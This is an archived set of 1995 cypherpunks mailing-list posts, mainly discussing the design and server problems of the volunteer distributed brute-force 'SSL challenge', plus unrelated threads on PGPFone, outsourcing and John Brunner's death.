Users should read brclient (and make me blush !) to show that there are no
trapdoors. Then they should read brloop and convince themselves that whatever
data is returned by brclient, no rogue command will be run.
(this is why brloop is written in sh rather than perl -- I assume more people
 read sh than perl ...
)

Note that brclient and brloop do not do any file I/O (so can be chroot'ed, etc)
and apart from "pretties" (such as calling hostname / uname -n to generate an
ID) brclient doesn't exec any other commands, so all you need provide are those
used by brloop (I think sed and head).
If anyone cares to build a "cell" in which to run it, please let me know.
However, I fear that it might be somewhat machine specific.
One problem is that the more recent brloop starts by asking "which servers
shoudl I use" unless they are explicitly set -- this means that you either need
to wire down the host to call (e.g. a local SKSP "local CPU farm" server),
or allow it to make an outgoing call to *ANY* host on port 19957 (well, you
might care to disable access to your local network, 127.* etc).

> If they do not have the expertise, they will hear of it soon enough when
> others scan the offered code.

I've been waiting, but not heard any yet :-))


After my experiences of a handfull of old clients killing the server for
everyone, I plan to circumvent the problem by causing rogue brloop's to exit.
Sure -- auto update would be nice, but until the padded cell above is
implemented




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Mon, 28 Aug 95 05:52:28 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <v01520c02ac676a6dcba1@[198.79.48.55]>
MIME-Version: 1.0
Content-Type: text/plain



>Better would be to figure out the encoding scheme and post it here.

I like this, myself.  It'd be nice to be able to have the picture of my
choosing instead of a digitized thumbprint...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 28 Aug 95 05:59:31 PDT
To: cypherpunks@toad.com
Subject: JOB_les
Message-ID: <199508281259.IAA13107@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-28-95. NYPaper, Page One lead:


   "Skilled Workers Watch Their Jobs Migrate Overseas. College
   Educated Foreigners Are Doing High-Technology Tasks for Far
   Less Pay."

      The new tools of the information age were supposed to
      help the United States regain an edge in international
      competition. And while that has happened in many
      advanced-technology industries, the combination of
      powerful personal computers and high-capacity undersea
      telephone cables is also subjecting millions of
      white-collar Americans to the same global wage pressures
      that their blue-collar counterparts have long faced. As
      with steel and garment workers, the white-collar
      workers' positions and salaries increasingly depend on
      whether they can justify their higher pay with higher
      productivity. Many fear that the growing tendency of
      corporations to farm out tasks to developing countries
      is widening the gap even further between the rich and
      everybody else in American society by eliminating some
      categories of high-skill, high-wage jobs that make up
      the heart of the middle class.


   "Dissecting the information revolution (in advance): With
   a look at one of Newt's Laws and at 'friction-free
   capitalism.' " [Expands on last week's Aspen article]

      The Aspen conference provided some people with their
      first exposure to Newtonion economics -- which appears
      to be the information-age equivalent of Ronald Reagan's
      trickle-down economics. It is called "friction-free
      capitalism." Nathan Myhrvold noted that one can now
      order custom-fit blue jeans directly from the
      manufacturer.


   Double trouble: JOB_les (17kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 09:39:06 PDT
To: hallam@w3.org
Subject: Re: SSL trouble
Message-ID: <9508281635.AA19987@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I did a distributed scheme for something else that had two levels, a master
and a group of slaves.  Only the slaves talked to the master.  For this 
effort I think a variation of the idea would be better.  Have all of the
brutes contact the master, who will, in the first transaction assign them
to the next slave in a round-robin fashion.  Then all of the transactions
from that point would take place between the brute and the slave:)  (Sounds
kind of like Conan or the Princess Bride.)

The slaves would each be delegated large chunks of the keyspace, but not
keyspace/numslaves.  Maybe 1/16th or something like that, and could ask for
more when their space was depleted.  Periodically, perhaps when requesting
more key space, and/or when a timer pops, the slaves could report results.
What I mean is that every so often they'd report even if they didn't need
more keyspace yet, iff they had any new stats to report.

The nice thing here is that the work of the master and of the slaves is
almost the same.  The slaves don't have to do the initial assignment of
slave, and the master doesn't have to report results, but everything else
is the same.  With careful design you could use the same daemon for both
with a command line argument to tell it if it was the master (-m) or the
slave (-s).  Of course I'm sure you see that this allows you to add as
many levels as you want to the hierarchy.  A slave doesn't care whether
a slave or a brute talks to it.  The only thing that changes with the 
levels is the max size of an allocated chunk.

For each daemon it would be nice to have the minimum, maximum and default
chunk size configurable.  The master might have all three the same, since
it would be expected to talk only to slaves.  That doesn't mean you couldn't
get more than, (for example), 16th of the keyspace to work on.  It just
means that you'd have to make more than one request.

You could make the slave software available as well, and a site with many
machines could have only the slave contact the master to get assigned a
slave to talk to, and could configure all of their brutes to talk to
their own slave.

Software like this is easy to write, (and fun), and we should go for it:)
Of course I do everything like this in C++, but I suppose perl would be the
most portable.  It's a shame it's so aethestically displeasing to the eye.
perl's never a pleasant read.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 28 Aug 95 09:46:47 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Server congestion
In-Reply-To: <"swan.cl.cam.:027060:950828094002"@cl.cam.ac.uk>
Message-ID: <199508281645.JAA12868@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > I talked about acks of acks in a previous message, and I guess is was
| > somewhat vague there.
| 
| ... and maybe based on a false premis ?
| 
| > What happened, according to my uninformed view, during the SSL2
| > challenge was that the server got congested, and had problems with
| > both answering to key allocation requests and ack replies.
| 
| Correct.
| 
| > I guess that the load of the machine was so high that it lost packets in 
the
| > input queues.
| 
| NO.
| 
| The load was very *LOW*.
| The problem was that the single threaded server was spending most of its ti
me
| talking to clients which failed to complete their interactions, and timed o
ut.
| The earlier client "ACK" code didn't hang around long enough, and gave up.
| Later code kept trying ....
| 
| > Client -----> UDP/Key allocation req ----> 
| 
| Nope -- basic fault here !! TCP not UDP !!

Ok, I'll be quiet now. It's funny when you think you know
what is happening based on an uninformed view, and simply
shuts out all the other pieces of info that gets to you.

By the way, thanks a lot Piete for the effort you put in!
You did excellent, and it was real fun! 32 hours with 
serious performance problems is simply amazing.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 07:11:03 PDT
To: cypherpunks@toad.com
Subject: Pre-allocating key segments
Message-ID: <199508281410.KAA16345@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Christian Wettergren <cwe@Csli.Stanford.EDU> writes:
>If the client is unable to retrieve a block from the server, I suggest
>it just picks a random block and starts working on it. I may very
>well not be allocated to someone else, and then the client was able
>to do something good in the meantime even though it didn't get a
>proper key alloc. 

Not only that, but the client ought to allocate some keyspace before it
needs it, as I think one other cpunk suggested.  For instance, if it has
four segments allocated and it's done three of them, it should fork a
process to begin requesting four more segments *while* it is scanning
the last segment, rather than waiting until after it is done and leaving
the machine idle until it can alloc more keys.

David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCUAwUBMEHCiREcrOJethBVAQHqfwP4xfVbdkyR19WA5k4oC0GjW80s3nNrLkXZ
mYspBE8e01waJ+6NYkeyvE4lPzW4OwkKTAtZV64GWovpjsyYh4bb7/mkpkdOktAZ
J9DkHXouQ5M23FImbIcfkVUqQdR5tmSdHQqOpUNYPVqT3JZR6IC9vzwYoqcnQWyY
WIIGs8DTUA==
=9Y8g
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Sun, 27 Aug 95 17:28:13 PDT
To: cypherpunks@toad.com
Subject: SSl challenge - it was fun!
Message-ID: <9508280028.AA28532@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi
> 
> Someone asked about the SSL challenge. Well  if you're interested
> here is a personal view from a "client" participant. 
> 
> Despite criticisms posted to this 
> list I think it worked pretty well for a first attempt,
> mainly due to Piete for hacking out new code and fixing things
> pretty quickly when things went wrong.
> 
> There was very little time to test software initially and
> get problems ironed out. I couldn't get brutessl to compile
> without tinkering and had timeout problems with brclient 
> due to the sometimes slow
> link from Austalia. Later versions of client software (that I didn't
> get till half way through the challenge) seemed to run without
> any problems and without losing ACKs. But my old client had failed
> to ACK quite a few of its earlier keyspaces and due to lack
> of a logfile I ended up writing a script to redo them and
> ACK them with the new version of the client software.
> 
> One problem with being in Australia was that I was asleep when
> new software updates were announced and tended to get them later
> than everyone else, and because of this an auto-update would
> be particularly useful to me if we do this again.
> 
> In the end it needed a bit of user intervention to get all
> my keyspaces ACKed but the problems were sorted out by the
> time the challenge was half way through and I think the next
> time we try this (and I hope we will) it will run much more
> smoothly. It was a good "learning" experience for all of us
> (especially Piete!) and should be regarded as what it was:
> an experiment that didn't run completely smoothly but was
> ultimately successful.
> 
> Taking part in the challenge was fun and I hope we can do
> another challenge sometime soon.
> 
> One gripe though - my ACKs don't appear on the credits list ;-(
> 
> Sherry
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 28 Aug 95 08:38:45 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: random coincidences
Message-ID: <9508281537.AA00466@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>  If NetScape uses such a PRNG to select 40bit keys for SSL, then
>  the work to be done in brute-force search going on right now might
>  be *significantly* reduced by knowing the planes on which the
>  numbers lie.  If the constants are particularly poor, there might
>  be as little as ten or twelve bits of real key.

So who here knows 80x86 assembler, is handy with a debugger, and has a few  
hours of spare time to figure out the PRNG?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 02:40:29 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Server congestion
In-Reply-To: <199508280041.RAA22255@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:027060:950828094002"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I talked about acks of acks in a previous message, and I guess is was
> somewhat vague there.

... and maybe based on a false premis ?

> What happened, according to my uninformed view, during the SSL2
> challenge was that the server got congested, and had problems with
> both answering to key allocation requests and ack replies.

Correct.

> I guess that the load of the machine was so high that it lost packets in the
> input queues.

NO.

The load was very *LOW*.
The problem was that the single threaded server was spending most of its time
talking to clients which failed to complete their interactions, and timed out.
The earlier client "ACK" code didn't hang around long enough, and gave up.
Later code kept trying ....

> Client -----> UDP/Key allocation req ----> 

Nope -- basic fault here !! TCP not UDP !!

> One problem was that the client believed that the ACK had arrived
> at the server if it had sent it off, not counting with the possibility
> of the ACK being lost on the way.

Not the case.
It uses a reliable bytestream, and the client does not consider a keyspace
ACKed until it get back the "OK" response from the server.
This makes it "at least once", but that isn't a problem.

> I instead propose that the Server sends a acknowledgement
> back to the client once it has received an ACK from a client.

It does, in the reliable bytestream ...

> The client has to handle the case that either the Ack or the
> Server-ack is lost.

As above -- "at least once" -- it just retries.

> I propose it doesn't retransmit immediately,
> but rather waits until next time it has to ack something, and 
> piggybacks the old ack onto the new one.

brclient waits a bit and tries again, before asking for the next.

> If the client is unable to retrieve a block from the server, I suggest
> it just picks a random block and starts working on it. I may very
> well not be allocated to someone else, and then the client was able
> to do something good in the meantime even though it didn't get a
> proper key alloc. 

Nah.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 28 Aug 95 11:15:51 PDT
To: cypherpunks@toad.com
Subject: R.I.P. John Brunner
Message-ID: <8KWGmyczBiiT075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Science fiction writer John Brunner died last Friday, August 25, from
a massive stroke, while attending the World Science Fiction Convention
in Glasgow, Scotland.

Among several other notable works, Brunner was the author of THE SHOCKWAVE
RIDER, a groundbreaking vision of the information age that inspired and
forsaw much that was pertinent to the Internet in general and the
Cypherpunks in particular.

Let us pause a moment to note his passing and honor his life and
contributions. 

   Alan Bostick             | "Oh.  You come to Heaven without a fortune?"
Seeking opportunity to      | "Yes."
develop multimedia content. | "Unfortunate."
Finger abostick@netcom.com  |      Roger Zelazny, LORD OF LIGHT
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMEIHReVevBgtmhnpAQG3IgL6A17RmOyCP/J4c/Dp5w1Qntv9/Ill90A/
OpulCQlBS4vBE5+yQ6nElJG0//13NNQ8/v73A/7hqeBEBZ6I0PG1rhdI8Iw5pqcd
74w4IYATmJ/YZe+IA/1GmqjwSohXcCbI
=Tf1e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 28 Aug 95 09:07:01 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <Pine.BSD/.3.91.950828111726.24612D-100000@escape.com>
Message-ID: <Pine.BSD.3.91.950828110205.6398A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought I saw a version over at ftp.hacktic.nl already. 
I tawt I taw a puddy tat. I did, I did taw a puddy tat!
And it's been in the incoming directory for all weekend too!

On Mon, 28 Aug 1995, Ray Arachelian wrote:

> $50 for 24 hours?  That's a bit too conservative.  I'd say within the 
> first 3 hours or less, and you can bet, non-final versions too will make 
> their way before that time. :-)
> 
> =================================================================93=======
>  + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
>   \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
> <--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
>   /|\  |    Just Say     |                                 |----\  /---- | 
>  + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
> =======/---------------------------------------------------------VI------/
>       /  I watched and weeped as the Exon bill passed, knowing that yet /
>      / another freedom vanished before my eyes.  How soon before we see/
>     /a full scale dictatorship in the name of decency? While the rest /
>    /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 28 Aug 95 08:30:39 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <Pine.BSD/.3.91.950828111726.24612D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


$50 for 24 hours?  That's a bit too conservative.  I'd say within the 
first 3 hours or less, and you can bet, non-final versions too will make 
their way before that time. :-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 28 Aug 95 09:24:04 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL trouble
Message-ID: <9508281622.AA00486@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Piete Brooks writes:
>  Let's not get implementations confused with algorithms ...  We were
>  using ALPHA code when we started ....

Pardon me here, as I don't mean to belittle your considerable efforts, but I  
think it was a mistake to make such loud announcements (posted to sci.crypt  
for instance) when the software was alpha!  The software should have been  
tested and stable before the general public was invited to participate and  
"see how fast we can break SSL"  As expected, lots of people tried to  
participate and the software just couldn't handle it.

How many patched versions of the client software were distributed after the  
effort had started?  If you want to do it as fast as possible, you can't be  
constantly updating your client software.

>  With BETA clients, a hierarchy and select/poll loops, I reckon a
>  server would stand a chance.

I think protocol issues are a Red Herring.  If your server had been able to  
handle more than one client at a time it would have stood a chance.  Why  
didn't it fork?  Sure, forking isn't the most efficient way to handle  
multiple clients, but HTTP servers (as well as SMTP and FTP) manage to handle  
hundreds of thousands of requests each day that way.  One client at a time  
with a 30-second timeout was just plain dumb...


I would recommend thorough testing of the software on many platforms and with  
realistic loads before the next public effort (there are plenty of willing  
testers on the cypherpunks list).  I tried to join in the effort and after  
discovering that the client software was firing off multiple brutessl  
processes, I decided to wait until the client stabilized.  I attempted to  
reject the keyspace I allocated through the WWW interface, but that didn't  
even work!!



andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 11:58:08 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: SSL trouble
Message-ID: <9508281854.AA20060@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
> 
> One of the things that the latest brloop does is make a call to the master
> server asking for a list of servers to contact :-))
> 
> Note that it is a list, and it tries them in order (all A RRs).

Wouldn't this result in the slaves higher in the list being hammered?
Perhaps you want to do something simular to what the later releases of 
bind do with machines with multiple names, and round robin the list.
If you had a list with hosts A, B, and C, the first request would get
ABC, the next BCA, the next CAB, and the next back to ABC.  That would
distrubute the work between the slaves a bit better.

> 
> > Then all of the transactions from that point would take place between the
> > brute and the slave:)
> 
> Currently just all the "allocate" transactions -- I haven't written my
> ACK reflector yet, so all ACKs go direct th the ACK master.
> 
> > The slaves would each be delegated large chunks of the keyspace,
> 
> No -- the slaves will not "be delegated" (as in pre-assigned address space),
> they will just ask the master for it as they need it.
> Sure, the'll do it in reasonable sized chunks, but not (2**16)/16 ....

Actually this is what I meant, that they would ask for it.  My idea would
be that when a slave is asked for keyspace, if they don't have enough
they'd ask for the next large chunk.  That way the central server doesn't
ever have to deal with small requests.
> 
> > but not keyspace/numslaves.  Maybe 1/16th or something like that, and could
> > ask for more when their space was depleted.  Periodically, perhaps when
> > requesting more key space, and/or when a timer pops, the slaves could report
> > results.
> 
> Nah - results still go direct pro tem.

You might consider it:)

> 
> > What I mean is that every so often they'd report even if they didn't need
> > more keyspace yet, iff they had any new stats to report.
> 
> Sure.
> 
> > The nice thing here is that the work of the master and of the slaves is
> > almost the same.i
> 
> You got it !
> 
> > The slaves don't have to do the initial assignment of slave,
> (slave -> slaves I assume)
> 
> > and the master doesn't have to report results, but everything else
> > is the same.
> 
> Yup -- code sharing !
> 
> > With careful design you could use the same daemon for both
> > with a command line argument to tell it if it was the master (-m) or the
> > slave (-s).
> 
> Well, not even that !
> 
> The slaves don't have the config file with the key info in it ...
> 
> > Of course I'm sure you see that this allows you to add as
> > many levels as you want to the hierarchy.
> 
> Indeed.
> 
> BUT ....
> 
> These cache servers are asking for non trivial amounts of keyspace.
> As such there should not be *too* many, and then need to be "managed" ...
> If one crashes, the logs need to be scanned to see how to restart it (so that
> it starts by doling out the segments that it had no sub-doled to its clients).

Quite right.  I'd assume that the first level list of slaves would be controlled
by you.  If you're careful enough a slave should be able to go down and come
back up without losing any state at all.  All brutes/slaves talking to it
should be able to continue on with no loss of information.  I would put 
an exponential backoff on the time between retries for the brutes talking
to the slaves as well as the slaves talking to the master.  (With a limit
for the amount of backoff of course.)  If you can't talk to someone you
might sleep for 8 seconds and retry, if you still couldn't back off to 16,
the 32, then 64, then 128, etc...the maximum might be somewhere around ten
or fifteen minutes, so that within ten or fifteen minutes of crashing and
being restarted everything would be humming along with no manual intervention
required on any of the lower levels.

> 
> > A slave doesn't care whether a slave or a brute talks to it.
> 
> Indeed -- that's how it was designed ...
> 
> However, note that with big cache servers (as opposed to Local CPU Farm servers
> where all clients are the same "ID") reports of sub-allocation have to be
> passed back to the root :-(

That's a good point.  If you want to keep track of who has what, it all has
to get back to the root eventually.  If you use my idea of having the
slaves cache the information until the next time they'd be contacting the
root anyway, (or whenever the timer elapses,) then you greatly cut down
on the number of small packets seen by the root, (and each level of slaves
when their's a hierarchy).

> 
> > You could make the slave software available as well, and a site with many
> > machines could have only the slave contact the master to get assigned a
> > slave to talk to, and could configure all of their brutes to talk to
> > their own slave.
> 
> Indeed -- the Local CPU Farm cache server is just about ready for ALPHA testers
> 
> > Software like this is easy to write, (and fun), and we should go for it:)
> 
> Done ...
> 
> > Of course I do everything like this in C++, but I suppose perl would be the
> > most portable.  It's a shame it's so aethestically displeasing to the eye.
> 
> Yeah -- but being based on C, C++ didn't stand much chance ...
> 
> > perl's never a pleasant read.
> 
> ... but better than C++ -- sure.

<snicker;>  Sound like we could have a religious war if we wanted, but this
isn't the right list for it:)  (sigh;) Maybe we should move this portion of
the discussion to alt.my.favorite.language.rules.and.yours.of.course.sucks.
I'm not really a snob about it...I still think cobol's great for some 
purposes, I just prefer coding in C++.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 28 Aug 95 09:14:42 PDT
To: lwp@mail.msen.com
Subject: Re: Turing test novel: "Galatea 2.2"
In-Reply-To: <oJVQwMz2Bo3D083yn@mail.msen.com>
Message-ID: <199508281614.MAA22790@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sounds interesting, but this is material for an AI list, not a list
that discusses cryptography.

Lou Poppler writes:
> Reviewed in The New Yorker (August 21&28 issue) is the novel 
> "Galatea 2.2" by Richard Powers, wherein a neural net is nurtured
> by an English Literature professor "to counterfeit human responses
> to the Master's Comprehensive Exam, which calls for the interpretation
> of set texts".  The review makes me want to read this book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 27 Aug 95 20:04:56 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: SSl challenge - it was fun!
In-Reply-To: <9508280028.AA28532@toad.com>
Message-ID: <199508280134.AA19987@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> One problem with being in Australia was that I was asleep when
>> new software updates were announced and tended to get them later
>> than everyone else, and because of this an auto-update would
>> be particularly useful to me if we do this again.

I would be extremely wary of this as accepting code written by someone else to
automatically run on your machine is bad. I realise the non unix people are
forced to use binaries and have no way of knowing what in hell is in the nice
software, but Unix people have a responsibility to themselves and the others
on their machines/networks to at least check that everything is ok. If they do
not have the expertise, they will hear of it soon enough when others scan the
offered code.

Having source code to these programs is essential, from a security and snub
the TLAs point of view. People need to be educated how to write systems
to use crypto and they need to be able to check no trojans are included.

Mark
mark@lochard.com.au
opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 13:12:48 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL trouble
Message-ID: <9508282009.AA20089@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


David Conrad wrote, quite well:
> 
> Patrick Horgan <patrick@Verity.COM> writes:
> >I did a distributed scheme for something else that had two levels, a master
> >and a group of slaves.  Only the slaves talked to the master.  For this 
> >effort I think a variation of the idea would be better.  Have all of the
> >brutes contact the master, who will, in the first transaction assign them
> >to the next slave in a round-robin fashion.
> 
> Why not just have the brutes pick a slave at random?  Of course, you need
> to give them a complete list of slaves to choose from.  But then the only
> difference between the master and the slaves will be that the master
> doesn't get any keyspace (it's got it all to begin with) and doesn't
> report any results upward.
> 

I think that this is a quite good idea with one caveat.  That we use a 
good random algorithm.  As people on this list are quite aware, many
algorithms that ship in libraries of commercial OSs are flawed in one
way or another.

Perhaps a combination of the two: give the whole list rotated in a
round-robin fashion, and let the client do with it as they will.  There
are enough coders on this list that we'll soon see independently 
developed versions of the client software, (although a published 
protocol for talking with the slaves would be nice), and some might
like to draw the first from the list, another randomly choose one,
etc...

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 14:33:05 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508282130.OAA17500@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Several people have suggested random keyspace selection instead of servers.
The problem is that there's a high probability that the search will fail to
find the correct key.  If you split the keyspace into n segments, and randomly
select k of them, the probability of failure p = ((n-1)/n)**k ; for k=n, 
p approaches 1/e (.367) as n becomes large, and 10 is close enough to large
that you don't gain much by having independent groups that agree not to overlap
in their own 10% of the keyspace.  For k=2n (random-searching the space
about twice),
the probability of failure is still e**-2, about 13%.  You need a
coordinated search.

>Why not just have the brutes pick a slave at random?  
>Of course, you need to give them a complete list of slaves to choose from. 

That more or less works, assuming you can distribute the list of slaves
along with the code; you still hit the slaves' DNS servers unless you
also distribute IP addresses for the slaves to use (which is probably fine
as long as people get the addresses beforehand.)
You could get fancy and have a DNS server hand out slave addresses round-robin
for a dummy address slave.cracker.org.

The main failure mode seems to have been misconfigured clients grabbing the
single-threaded server for a long time; it may be worth using a multi-threaded
server, or alternatively a single-threaded server that has a fast timeout 
for how long it will talk to a client.

I gather there was some protection in the code against dishonest clients,
but a malicious attack would be to falsely ACK large portions of
the search space (especially the portion containing the real answer,
if the attacker knows it).  
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 28 Aug 95 14:33:23 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
Message-ID: <199508282130.OAA17520@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 AM 8/25/95 -0400, you wrote:
>1) Abandon the central command way of doing things.  Little if any
>communication is required for this computation, it should be
>self-distributing to and between volenteer sites.  That makes it ideal
>for implementation as a safe virus. 

Doling out keyspace _does_ require central coordination, though
the job can be delegated to _trusted_ volunteers, or delegated
with redundancy to semi-trusted ones.

As far as safe viruses go, I've had more free lunches than safe viruses,
though I've been offered both out of "charity".  Some of the lunches
were good, and charitable; the viruses have been, at best, mostly harmless.
Perhaps under Safe-Tele-Java-Script it will be possible to send
self-modifying self-reproducing scripts around a network to unsuspecting
machines, but I doubt it.

>2) Give these computations a defined and limited lifetime.  The problem
>you have with old versions is because they don't die automatically or
>even check to see if they are up-to-date and update themselves.

Yeah.  In this case, the lifetime of the versions was less than the
expected lifetime of some of the searches.  Automated version-checking would
help, but the version changes made it difficult to communicate even simple
requests like "Give me a number".  Perhaps it would make sense for version
upgrading to include changing the server's TCP port so the old versions
don't hose the servers for the new versions.

>3) Use randomness to break up the search space and redundantly perform
>the computation.  This should eliminate the problems with malicious
>key-space requests, etc.

Randomness doesn't help much, since it's hard to be sure you
sweep the whole keyspace.  Redundancy does help, but it's still tough
to protect against sufficiently malicious attackers.

>4) Use feedback in the form of selective survival/replication to
>optimize the search and allocate search space.  If a processor goes
>quickly, give it more to do - if it goes slowly, give it less.  This
